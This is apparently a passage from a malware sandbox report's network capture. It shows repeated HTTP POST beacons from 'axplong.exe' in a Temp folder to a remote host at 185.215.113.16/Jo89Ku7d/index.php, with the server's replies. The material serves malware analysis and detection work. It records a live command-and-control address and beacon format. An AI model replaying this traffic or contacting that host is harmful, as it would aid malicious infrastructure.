Sep 27, 2024 00:20:28.304115057 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:28.527620077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:28.653286934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:29.371143103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:29.372488022 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:29.605664968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:29.719175100 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:30.440591097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:30.441497087 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:30.673533916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:30.796148062 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:31.513525009 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:31.514511108 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:31.747541904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:31.858158112 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:32.554923058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:32.555843115 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:32.782084942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:32.904999971 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:33.605915070 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:33.749284983 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:33.975999117 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:34.092222929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:34.894733906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:34.895554066 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:35.120089054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:35.230693102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:35.927007914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:35.931111097 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:36.156299114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:36.277964115 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:36.973047018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:36.974416971 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:37.199002981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:37.311707020 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:38.015285969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:38.016035080 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:38.241451025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:38.361660957 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:39.094549894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:39.095506907 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:39.330702066 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:39.450514078 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:40.152733088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:40.153729916 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:40.380983114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:40.500627995 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:41.239897966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:41.240827084 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:41.472112894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
